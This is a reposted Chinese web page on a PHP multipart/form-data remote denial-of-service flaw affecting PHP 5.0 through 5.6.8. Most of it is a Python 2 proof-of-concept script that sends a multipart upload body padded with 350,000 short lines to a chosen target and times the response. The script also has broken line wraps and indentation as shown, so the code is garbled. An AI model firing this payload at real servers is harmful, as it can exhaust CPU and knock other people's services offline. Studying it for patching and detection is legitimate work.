碼上歡樂
相關內容    簡體    繁體

PHP multipart/form-data 遠程DOS漏洞

本文轉載自   查看原文   2019-12-04 16:47   427    Web滲透測試 
import sys
import urllib,urllib2
import datetime
from optparse import OptionParser
def http_proxy(proxy_url):
    proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy
def check_php_multipartform_dos(url,post_body,headers):
    req = urllib2.Request(url)
    for key in headers.keys():
        req.add_header(key,headers[key])
    starttime = datetime.datetime.now();
    fd = urllib2.urlopen(req,post_body)
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime=(endtime - starttime).seconds
    if(usetime > 5):
        result = url+" is vulnerable";
    else:
        if(usetime > 3):
            result = "need to check normal respond time"
    return [result,usetime]
#end
def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                  dest="target",
                  default=False,
                  type="string",
                  help="test target")
    (options, args) = parser.parse_args()
    if(options.target):
        target = options.target
    else:
        return;
    Num=350000
    headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
            'Accept-Encoding':'gzip, deflate',
            'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = 
"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: 
form-data; name=\"file\"; filename=sp.jpg"
    payload=""
    for i in range(0,Num):
        payload = payload + "a\n"
    body = body + payload;
body = body + 
"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------
WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting...";
    respond=check_php_multipartform_dos(target,body,headers)
    print "Result : "
    print respond[0]
    print "Respond time : "+str(respond[1]) + " seconds";
if __name__=="__main__":
    main()

  

PHP 在處理HTTP請求中的multipart/form-data頭部數據時存在一個安全漏洞,導致PHP大量重復分配和拷貝內存的操作,可能造成CPU資源占用100%並持續較長時間,這可能造成遠程拒絕服務攻擊。受影響的軟件及系統:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 multipart/form-data multipart/form-data格式 什么是multipart/form-data請求 什么是multipart/form-data請求 TNetHttpClient multipart/form-data mormot multipart/form-data 什么是multipart/form-data請求 multipart/form-data提交 什么是multipart/form-data請求 Form的enctype="multipart/form-data"作用
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM